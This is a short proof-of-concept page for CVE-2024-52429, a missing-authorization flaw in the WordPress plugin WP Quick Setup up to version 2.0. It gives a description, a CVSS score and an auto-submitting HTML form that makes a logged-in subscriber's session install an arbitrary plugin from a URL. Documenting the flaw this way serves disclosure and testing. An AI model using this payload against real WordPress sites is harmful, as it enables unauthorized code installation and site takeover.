CVE-2024-52429 PoC — WordPress plugin WP Quick Setup 代码问题漏洞

Source

Associated Vulnerability

Description

WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation

Readme

# CVE-2024-52429
WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation

# Description: 

The WP Quick Setup plugin for WordPress is vulnerable to unauthorized plugin and theme installation due to a missing capability check on a function in all versions up to, and including, 2.0. This makes it 

```
Type: plugin
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52429
```

POC
---

Login as a subscriber then run this html

```
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wes&#95;install&#95;plugins" />
      <input type="hidden" name="plugin&#95;urls&#91;&#93;" value="https&#58;&#47;&#47;downloads&#46;wordpress&#46;org&#47;plugin&#47;wdes&#45;responsive&#45;mobile&#45;menu&#46;zip" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

File Snapshot

 [4.0K]  /data/pocs/1fb565b4595c9e0568f9bfe5d0b9908aa6554dba
└── [1.1K]  README.md

0 directories, 1 file

Remarks